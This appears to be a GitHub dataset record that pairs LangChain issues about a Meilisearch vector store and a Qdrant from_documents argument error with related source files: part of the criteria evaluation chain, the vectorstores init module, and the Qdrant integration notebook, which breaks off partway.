name to its description - a single criterion name present in one of the default criteria - a single `ConstitutionalPrinciple` instance prompt : Optional[BasePromptTemplate], default=None The prompt template to use for generating prompts. If not provided, a default prompt template will be used. **kwargs : Any Additional keyword arguments to pass to the `LLMChain` constructor. Returns ------- CriteriaEvalChain An instance of the `CriteriaEvalChain` class. Examples -------- >>> from langchain.llms import OpenAI >>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain >>> llm = OpenAI() >>> criteria = { "hallucination": ( "Does this submission contain information" " not present in the input or reference?" ), } >>> chain = LabeledCriteriaEvalChain.from_llm( llm=llm, criteria=criteria, ) """ prompt_ = cls._resolve_prompt(prompt) if criteria == Criteria.CORRECTNESS: raise ValueError( "Correctness should not be used in the reference-free" " 'criteria' evaluator (CriteriaEvalChain)." " Please use the 'labeled_criteria' evaluator" " (LabeledCriteriaEvalChain) instead." ) criteria_ = cls.resolve_criteria(criteria) criteria_str = " ".join(f"{k}: {v}" for k, v in criteria_.items()) prompt_ = prompt_.partial(criteria=criteria_str) return cls( llm=llm, prompt=prompt_, criterion_name="-".join(criteria_), **kwargs, ) def _get_eval_input( self, prediction: str, reference: Optional[str], input: Optional[str], ) -> dict: """Get the evaluation input.""" input_ = { "input": input, "output": prediction, } if self.requires_reference: input_["reference"] = reference return input_ def _prepare_output(self, result: dict) -> dict: """Prepare the output.""" parsed = result[self.output_key] if RUN_KEY in result: parsed[RUN_KEY] = result[RUN_KEY] return parsed def _evaluate_strings( self, *, prediction: str, reference: Optional[str] = None, input: Optional[str] = None, callbacks: Callbacks = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, include_run_info: bool = False, **kwargs: Any, ) -> dict: """Evaluate a prediction against the criteria. Parameters ---------- prediction : str The predicted text to evaluate. reference : Optional[str], default=None The reference text to compare against. This is required if `requires_reference` is `True`. input : Optional[str], default=None The input text used to generate the prediction. **kwargs : Any Additional keyword arguments to pass to the `LLMChain` `__call__` method. Returns ------- dict The evaluation results. Examples -------- >>> from langchain.llms import OpenAI >>> from langchain.evaluation.criteria import CriteriaEvalChain >>> llm = OpenAI() >>> criteria = "conciseness" >>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria) >>> chain.evaluate_strings( prediction="The answer is 42.", reference="42", input="What is the answer to life, the universe, and everything?", ) """ input_ = self._get_eval_input(prediction, reference, input) result = self( input_, callbacks=callbacks, tags=tags, metadata=metadata, include_run_info=include_run_info, ) return self._prepare_output(result) async def _aevaluate_strings( self, *, prediction: str, reference: Optional[str] = None, input: Optional[str] = None, callbacks: Callbacks = None, tags: Optional[List[str]] = None, metadata: Optional[Dict[str, Any]] = None, include_run_info: bool = False, **kwargs: Any, ) -> dict: """Asynchronously evaluate a prediction against the criteria. Parameters ---------- prediction : str The predicted text to evaluate. reference : Optional[str], default=None The reference text to compare against. This is required if `requires_reference` is `True`. input : Optional[str], default=None The input text used to generate the prediction. **kwargs : Any Additional keyword arguments to pass to the `LLMChain` `acall` method. Returns ------- dict The evaluation results. Examples -------- >>> from langchain.llms import OpenAI >>> from langchain.evaluation.criteria import CriteriaEvalChain >>> llm = OpenAI() >>> criteria = "conciseness" >>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria) >>> await chain.aevaluate_strings( prediction="The answer is 42.", reference="42", input="What is the answer to life, the universe, and everything?", ) """ input_ = self._get_eval_input(prediction, reference, input) result = await self.acall( input_, callbacks=callbacks, tags=tags, metadata=metadata, include_run_info=include_run_info, ) return self._prepare_output(result) class LabeledCriteriaEvalChain(CriteriaEvalChain): """Criteria evaluation chain that requires references.""" @property def requires_reference(self) -> bool: """Whether the evaluation requires a reference text.""" return True @classmethod def _resolve_prompt( cls, prompt: Optional[BasePromptTemplate] = None ) -> BasePromptTemplate: expected_input_vars = {"input", "output", "criteria", "reference"} prompt_ = prompt or PROMPT_WITH_REFERENCES if expected_input_vars != set(prompt_.input_variables): raise ValueError( f"Input variables should be {expected_input_vars}, " f"but got {prompt_.input_variables}" ) return prompt_ @classmethod def from_llm( cls, llm: BaseLanguageModel, criteria: Optional[CRITERIA_TYPE] = None, *, prompt: Optional[BasePromptTemplate] = None, **kwargs: Any, ) -> CriteriaEvalChain: """Create a `LabeledCriteriaEvalChain` instance from an llm and criteria. Parameters ---------- llm : BaseLanguageModel The language model to use for evaluation. criteria : CRITERIA_TYPE - default=None for "helpfulness" The criteria to evaluate the runs against. It can be: - a mapping of a criterion name to its description - a single criterion name present in one of the default criteria - a single `ConstitutionalPrinciple` instance prompt : Optional[BasePromptTemplate], default=None The prompt template to use for generating prompts. If not provided, a default prompt will be used. **kwargs : Any Additional keyword arguments to pass to the `LLMChain` constructor. Returns ------- LabeledCriteriaEvalChain An instance of the `LabeledCriteriaEvalChain` class. Examples -------- >>> from langchain.llms import OpenAI >>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain >>> llm = OpenAI() >>> criteria = { "hallucination": ( "Does this submission contain information" " not present in the input or reference?" ), } >>> chain = LabeledCriteriaEvalChain.from_llm( llm=llm, criteria=criteria, ) """ prompt = cls._resolve_prompt(prompt) criteria_ = cls.resolve_criteria(criteria) criteria_str = " ".join(f"{k}: {v}" for k, v in criteria_.items()) prompt_ = prompt.partial(criteria=criteria_str) return cls( llm=llm, prompt=prompt_, criterion_name="-".join(criteria_), **kwargs, )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
docs/extras/integrations/vectorstores/meilisearch.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/langchain/vectorstores/__init__.py
"""Wrappers on top of vector stores.""" from langchain.vectorstores.alibabacloud_opensearch import ( AlibabaCloudOpenSearch, AlibabaCloudOpenSearchSettings, ) from langchain.vectorstores.analyticdb import AnalyticDB from langchain.vectorstores.annoy import Annoy from langchain.vectorstores.atlas import AtlasDB from langchain.vectorstores.awadb import AwaDB from langchain.vectorstores.azuresearch import AzureSearch from langchain.vectorstores.base import VectorStore from langchain.vectorstores.cassandra import Cassandra from langchain.vectorstores.chroma import Chroma from langchain.vectorstores.clarifai import Clarifai from langchain.vectorstores.clickhouse import Clickhouse, ClickhouseSettings from langchain.vectorstores.deeplake import DeepLake from langchain.vectorstores.docarray import DocArrayHnswSearch, DocArrayInMemorySearch from langchain.vectorstores.elastic_vector_search import ( ElasticKnnSearch, ElasticVectorSearch, ) from langchain.vectorstores.faiss import FAISS from langchain.vectorstores.hologres import Hologres from langchain.vectorstores.lancedb import LanceDB from langchain.vectorstores.marqo import Marqo from langchain.vectorstores.matching_engine import MatchingEngine from langchain.vectorstores.milvus import Milvus from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch from langchain.vectorstores.myscale import MyScale, MyScaleSettings from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch from langchain.vectorstores.pgembedding import PGEmbedding from langchain.vectorstores.pgvector import PGVector from langchain.vectorstores.pinecone import Pinecone from langchain.vectorstores.qdrant import Qdrant from langchain.vectorstores.redis import Redis from langchain.vectorstores.rocksetdb import Rockset from langchain.vectorstores.singlestoredb import SingleStoreDB from langchain.vectorstores.sklearn import SKLearnVectorStore from langchain.vectorstores.starrocks import StarRocks from langchain.vectorstores.supabase import SupabaseVectorStore from langchain.vectorstores.tair import Tair from langchain.vectorstores.tigris import Tigris from langchain.vectorstores.typesense import Typesense from langchain.vectorstores.vectara import Vectara from langchain.vectorstores.weaviate import Weaviate from langchain.vectorstores.zilliz import Zilliz __all__ = [ "AlibabaCloudOpenSearch", "AlibabaCloudOpenSearchSettings", "AnalyticDB", "Annoy", "AtlasDB", "AwaDB", "AzureSearch", "Cassandra", "Chroma", "Clickhouse", "ClickhouseSettings", "DeepLake", "DocArrayHnswSearch", "DocArrayInMemorySearch", "ElasticVectorSearch", "ElasticKnnSearch", "FAISS", "PGEmbedding", "Hologres", "LanceDB", "MatchingEngine", "Marqo", "Milvus", "Zilliz", "SingleStoreDB", "Chroma", "Clarifai", "OpenSearchVectorSearch", "AtlasDB", "DeepLake", "Annoy", "MongoDBAtlasVectorSearch", "MyScale", "MyScaleSettings", "OpenSearchVectorSearch", "Pinecone", "Qdrant", "Redis", "Rockset", "SKLearnVectorStore", "SingleStoreDB", "StarRocks", "SupabaseVectorStore", "Tair", "Tigris", "Typesense", "Vectara", "VectorStore", "Weaviate", "Zilliz", "PGVector", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/langchain/vectorstores/meilisearch.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/tests/integration_tests/vectorstores/docker-compose/meilisearch.yaml
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/tests/integration_tests/vectorstores/test_meilisearch.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,457
VectorStore.from_documents() takes 3 positional arguments but 4 were given
### System Info ... % python --version Python 3.11.4 ... % pip show langchain | grep Version Version: 0.0.247 ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction When following the langchain docs [here](https://python.langchain.com/docs/integrations/vectorstores/qdrant#qdrant-cloud), there will be an error thrown: ```py qdrant = Qdrant.from_documents( docs, embeddings, url, prefer_grpc=True, api_key=api_key, collection_name="test", ) ``` error: ``` Traceback (most recent call last): File "...myscript.py", line 29, in <module> qdrant = Qdrant.from_documents( ^^^^^^^^^^^^^^^^^^^^^^ TypeError: VectorStore.from_documents() takes 3 positional arguments but 4 were given ``` Is it related to https://github.com/langchain-ai/langchain/pull/7910 ? ### Expected behavior QDrant being initialized properly.
https://github.com/langchain-ai/langchain/issues/8457
https://github.com/langchain-ai/langchain/pull/8482
4923cf029a36504a00368abe6b9c8b77e46aa740
08f5e6b8012f5eda2609103f33676199a3781a15
"2023-07-29T10:53:33Z"
python
"2023-07-30T20:24:44Z"
docs/extras/integrations/vectorstores/qdrant.ipynb
{ "cells": [ { "attachments": {}, "cell_type": "markdown", "id": "683953b3", "metadata": {}, "source": [ "# Qdrant\n", "\n", ">[Qdrant](https://qdrant.tech/documentation/) (read: quadrant ) is a vector similarity search engine. It provides a production-ready service with a convenient API to store, search, and manage points - vectors with an additional payload. `Qdrant` is tailored to extended filtering support. It makes it useful for all sorts of neural network or semantic-based matching, faceted search, and other applications.\n", "\n", "\n", "This notebook shows how to use functionality related to the `Qdrant` vector database. \n", "\n", "There are various modes of how to run `Qdrant`, and depending on the chosen one, there will be some subtle differences. The options include:\n", "- Local mode, no server required\n", "- On-premise server deployment\n", "- Qdrant Cloud\n", "\n", "See the [installation instructions](https://qdrant.tech/documentation/install/)." ] }, { "cell_type": "code", "execution_count": null, "id": "e03e8460-8f32-4d1f-bb93-4f7636a476fa", "metadata": { "tags": [] }, "outputs": [], "source": [ "!pip install qdrant-client" ] }, { "attachments": {}, "cell_type": "markdown", "id": "7b2f111b-357a-4f42-9730-ef0603bdc1b5", "metadata": {}, "source": [ "We want to use `OpenAIEmbeddings` so we have to get the OpenAI API Key." ] }, { "cell_type": "code", "execution_count": 2, "id": "082e7e8b-ac52-430c-98d6-8f0924457642", "metadata": { "tags": [] }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "OpenAI API Key: \u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\n" ] } ], "source": [ "import os\n", "import getpass\n", "\n", "os.environ[\"OPENAI_API_KEY\"] = getpass.getpass(\"OpenAI API Key:\")" ] }, { "cell_type": "code", "execution_count": 3, "id": "aac9563e", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:22.282884Z", "start_time": "2023-04-04T10:51:21.408077Z" }, "tags": [] }, "outputs": [], "source": [ "from langchain.embeddings.openai import OpenAIEmbeddings\n", "from langchain.text_splitter import CharacterTextSplitter\n", "from langchain.vectorstores import Qdrant\n", "from langchain.document_loaders import TextLoader" ] }, { "cell_type": "code", "execution_count": 4, "id": "a3c3999a", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:22.520144Z", "start_time": "2023-04-04T10:51:22.285826Z" }, "tags": [] }, "outputs": [], "source": [ "loader = TextLoader(\"../../../state_of_the_union.txt\")\n", "documents = loader.load()\n", "text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n", "docs = text_splitter.split_documents(documents)\n", "\n", "embeddings = OpenAIEmbeddings()" ] }, { "attachments": {}, "cell_type": "markdown", "id": "eeead681", "metadata": {}, "source": [ "## Connecting to Qdrant from LangChain\n", "\n", "### Local mode\n", "\n", "Python client allows you to run the same code in local mode without running the Qdrant server. That's great for testing things out and debugging or if you plan to store just a small amount of vectors. The embeddings might be fully kepy in memory or persisted on disk.\n", "\n", "#### In-memory\n", "\n", "For some testing scenarios and quick experiments, you may prefer to keep all the data in memory only, so it gets lost when the client is destroyed - usually at the end of your script/notebook." ] }, { "cell_type": "code", "execution_count": 5, "id": "8429667e", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:22.525091Z", "start_time": "2023-04-04T10:51:22.522015Z" }, "tags": [] }, "outputs": [], "source": [ "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " location=\":memory:\", # Local mode with in-memory storage only\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "59f0b954", "metadata": {}, "source": [ "#### On-disk storage\n", "\n", "Local mode, without using the Qdrant server, may also store your vectors on disk so they're persisted between runs." ] }, { "cell_type": "code", "execution_count": 6, "id": "24b370e2", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.827567Z", "start_time": "2023-04-04T10:51:22.529080Z" }, "tags": [] }, "outputs": [], "source": [ "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " path=\"/tmp/local_qdrant\",\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "749658ce", "metadata": {}, "source": [ "### On-premise server deployment\n", "\n", "No matter if you choose to launch Qdrant locally with [a Docker container](https://qdrant.tech/documentation/install/), or select a Kubernetes deployment with [the official Helm chart](https://github.com/qdrant/qdrant-helm), the way you're going to connect to such an instance will be identical. You'll need to provide a URL pointing to the service." ] }, { "cell_type": "code", "execution_count": 5, "id": "91e7f5ce", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.832708Z", "start_time": "2023-04-04T10:51:24.829905Z" } }, "outputs": [], "source": [ "url = \"<---qdrant url here --->\"\n", "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " url,\n", " prefer_grpc=True,\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "c9e21ce9", "metadata": {}, "source": [ "### Qdrant Cloud\n", "\n", "If you prefer not to keep yourself busy with managing the infrastructure, you can choose to set up a fully-managed Qdrant cluster on [Qdrant Cloud](https://cloud.qdrant.io/). There is a free forever 1GB cluster included for trying out. The main difference with using a managed version of Qdrant is that you'll need to provide an API key to secure your deployment from being accessed publicly." ] }, { "cell_type": "code", "execution_count": 6, "id": "dcf88bdf", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.837599Z", "start_time": "2023-04-04T10:51:24.834690Z" } }, "outputs": [], "source": [ "url = \"<---qdrant cloud cluster url here --->\"\n", "api_key = \"<---api key here--->\"\n", "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " url,\n", " prefer_grpc=True,\n", " api_key=api_key,\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "93540013", "metadata": {}, "source": [ "## Recreating the collection\n", "\n", "Both `Qdrant.from_texts` and `Qdrant.from_documents` methods are great to start using Qdrant with Langchain. In the previous versions the collection was recreated every time you called any of them. That behaviour has changed. Currently, the collection is going to be reused if it already exists. Setting `force_recreate` to `True` allows to remove the old collection and start from scratch." ] }, { "cell_type": "code", "execution_count": 8, "id": "30a87570", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.854117Z", "start_time": "2023-04-04T10:51:24.845385Z" } }, "outputs": [], "source": [ "url = \"<---qdrant url here --->\"\n", "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " url,\n", " prefer_grpc=True,\n", " collection_name=\"my_documents\",\n", " force_recreate=True,\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "1f9215c8", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T09:27:29.920258Z", "start_time": "2023-04-04T09:27:29.913714Z" } }, "source": [ "## Similarity search\n", "\n", "The simplest scenario for using Qdrant vector store is to perform a similarity search. Under the hood, our query will be encoded with the `embedding_function` and used to find similar documents in Qdrant collection." ] }, { "cell_type": "code", "execution_count": 7, "id": "a8c513ab", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.204469Z", "start_time": "2023-04-04T10:51:24.855618Z" }, "tags": [] }, "outputs": [], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.similarity_search(query)" ] }, { "cell_type": "code", "execution_count": 8, "id": "fc516993", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.220984Z", "start_time": "2023-04-04T10:51:25.213943Z" }, "tags": [] }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.\n" ] } ], "source": [ "print(found_docs[0].page_content)" ] }, { "attachments": {}, "cell_type": "markdown", "id": "1bda9bf5", "metadata": {}, "source": [ "## Similarity search with score\n", "\n", "Sometimes we might want to perform the search, but also obtain a relevancy score to know how good is a particular result. \n", "The returned distance score is cosine distance. Therefore, a lower score is better." ] }, { "cell_type": "code", "execution_count": 11, "id": "8804a21d", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.631585Z", "start_time": "2023-04-04T10:51:25.227384Z" } }, "outputs": [], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.similarity_search_with_score(query)" ] }, { "cell_type": "code", "execution_count": 12, "id": "756a6887", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:25.642282Z", "start_time": "2023-04-04T10:51:25.635947Z" } }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.\n", "\n", "Score: 0.8153784913324512\n" ] } ], "source": [ "document, score = found_docs[0]\n", "print(document.page_content)\n", "print(f\"\\nScore: {score}\")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "525e3582", "metadata": {}, "source": [ "### Metadata filtering\n", "\n", "Qdrant has an [extensive filtering system](https://qdrant.tech/documentation/concepts/filtering/) with rich type support. It is also possible to use the filters in Langchain, by passing an additional param to both the `similarity_search_with_score` and `similarity_search` methods." ] }, { "attachments": {}, "cell_type": "markdown", "id": "1c2c58dc", "metadata": {}, "source": [ "```python\n", "from qdrant_client.http import models as rest\n", "\n", "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.similarity_search_with_score(query, filter=rest.Filter(...))\n", "```" ] }, { "attachments": {}, "cell_type": "markdown", "id": "c58c30bf", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:39:53.032744Z", "start_time": "2023-04-04T10:39:53.028673Z" } }, "source": [ "## Maximum marginal relevance search (MMR)\n", "\n", "If you'd like to look up for some similar documents, but you'd also like to receive diverse results, MMR is method you should consider. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents." ] }, { "cell_type": "code", "execution_count": 13, "id": "76810fb6", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.010947Z", "start_time": "2023-04-04T10:51:25.647687Z" } }, "outputs": [], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "found_docs = qdrant.max_marginal_relevance_search(query, k=2, fetch_k=10)" ] }, { "cell_type": "code", "execution_count": 14, "id": "80c6db11", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.016979Z", "start_time": "2023-04-04T10:51:26.013329Z" } }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "1. Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \n", "\n", "Tonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \n", "\n", "One of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \n", "\n", "And I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence. \n", "\n", "2. We can\u2019t change how divided we\u2019ve been. But we can change how we move forward\u2014on COVID-19 and other issues we must face together. \n", "\n", "I recently visited the New York City Police Department days after the funerals of Officer Wilbert Mora and his partner, Officer Jason Rivera. \n", "\n", "They were responding to a 9-1-1 call when a man shot and killed them with a stolen gun. \n", "\n", "Officer Mora was 27 years old. \n", "\n", "Officer Rivera was 22. \n", "\n", "Both Dominican Americans who\u2019d grown up on the same streets they later chose to patrol as police officers. \n", "\n", "I spoke with their families and told them that we are forever in debt for their sacrifice, and we will carry on their mission to restore the trust and safety every community deserves. \n", "\n", "I\u2019ve worked on these issues a long time. \n", "\n", "I know what works: Investing in crime preventionand community police officers who\u2019ll walk the beat, who\u2019ll know the neighborhood, and who can restore trust and safety. \n", "\n" ] } ], "source": [ "for i, doc in enumerate(found_docs):\n", " print(f\"{i + 1}.\", doc.page_content, \"\\n\")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "691a82d6", "metadata": {}, "source": [ "## Qdrant as a Retriever\n", "\n", "Qdrant, as all the other vector stores, is a LangChain Retriever, by using cosine similarity. " ] }, { "cell_type": "code", "execution_count": 15, "id": "9427195f", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.031451Z", "start_time": "2023-04-04T10:51:26.018763Z" } }, "outputs": [ { "data": { "text/plain": [ "VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x7fc4e5720a00>, search_type='similarity', search_kwargs={})" ] }, "execution_count": 15, "metadata": {}, "output_type": "execute_result" } ], "source": [ "retriever = qdrant.as_retriever()\n", "retriever" ] }, { "attachments": {}, "cell_type": "markdown", "id": "0c851b4f", "metadata": {}, "source": [ "It might be also specified to use MMR as a search strategy, instead of similarity." ] }, { "cell_type": "code", "execution_count": 16, "id": "64348f1b", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.043909Z", "start_time": "2023-04-04T10:51:26.034284Z" } }, "outputs": [ { "data": { "text/plain": [ "VectorStoreRetriever(vectorstore=<langchain.vectorstores.qdrant.Qdrant object at 0x7fc4e5720a00>, search_type='mmr', search_kwargs={})" ] }, "execution_count": 16, "metadata": {}, "output_type": "execute_result" } ], "source": [ "retriever = qdrant.as_retriever(search_type=\"mmr\")\n", "retriever" ] }, { "cell_type": "code", "execution_count": 17, "id": "f3c70c31", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:26.495652Z", "start_time": "2023-04-04T10:51:26.046407Z" } }, "outputs": [ { "data": { "text/plain": [ "Document(page_content='Tonight. I call on the Senate to: Pass the Freedom to Vote Act. Pass the John Lewis Voting Rights Act. And while you\u2019re at it, pass the Disclose Act so Americans can know who is funding our elections. \\n\\nTonight, I\u2019d like to honor someone who has dedicated his life to serve this country: Justice Stephen Breyer\u2014an Army veteran, Constitutional scholar, and retiring Justice of the United States Supreme Court. Justice Breyer, thank you for your service. \\n\\nOne of the most serious constitutional responsibilities a President has is nominating someone to serve on the United States Supreme Court. \\n\\nAnd I did that 4 days ago, when I nominated Circuit Court of Appeals Judge Ketanji Brown Jackson. One of our nation\u2019s top legal minds, who will continue Justice Breyer\u2019s legacy of excellence.', metadata={'source': '../../../state_of_the_union.txt'})" ] }, "execution_count": 17, "metadata": {}, "output_type": "execute_result" } ], "source": [ "query = \"What did the president say about Ketanji Brown Jackson\"\n", "retriever.get_relevant_documents(query)[0]" ] }, { "attachments": {}, "cell_type": "markdown", "id": "0358ecde", "metadata": {}, "source": [ "## Customizing Qdrant\n", "\n", "There are some options to use an existing Qdrant collection within your Langchain application. In such cases you may need to define how to map Qdrant point into the Langchain `Document`.\n", "\n", "### Named vectors\n", "\n", "Qdrant supports [multiple vectors per point](https://qdrant.tech/documentation/concepts/collections/#collection-with-multiple-vectors) by named vectors. Langchain requires just a single embedding per document and, by default, uses a single vector. However, if you work with a collection created externally or want to have the named vector used, you can configure it by providing its name.\n" ] }, { "cell_type": "code", "execution_count": null, "outputs": [], "source": [ "Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " location=\":memory:\",\n", " collection_name=\"my_documents_2\",\n", " vector_name=\"custom_vector\",\n", ")" ], "metadata": { "collapsed": false }, "id": "1f11adf8" }, { "cell_type": "markdown", "source": [ "As a Langchain user, you won't see any difference whether you use named vectors or not. Qdrant integration will handle the conversion under the hood." ], "metadata": { "collapsed": false }, "id": "b34f5230" }, { "cell_type": "markdown", "source": [ "### Metadata\n", "\n", "Qdrant stores your vector embeddings along with the optional JSON-like payload. Payloads are optional, but since LangChain assumes the embeddings are generated from the documents, we keep the context data, so you can extract the original texts as well.\n", "\n", "By default, your document is going to be stored in the following payload structure:\n", "\n", "```json\n", "{\n", " \"page_content\": \"Lorem ipsum dolor sit amet\",\n", " \"metadata\": 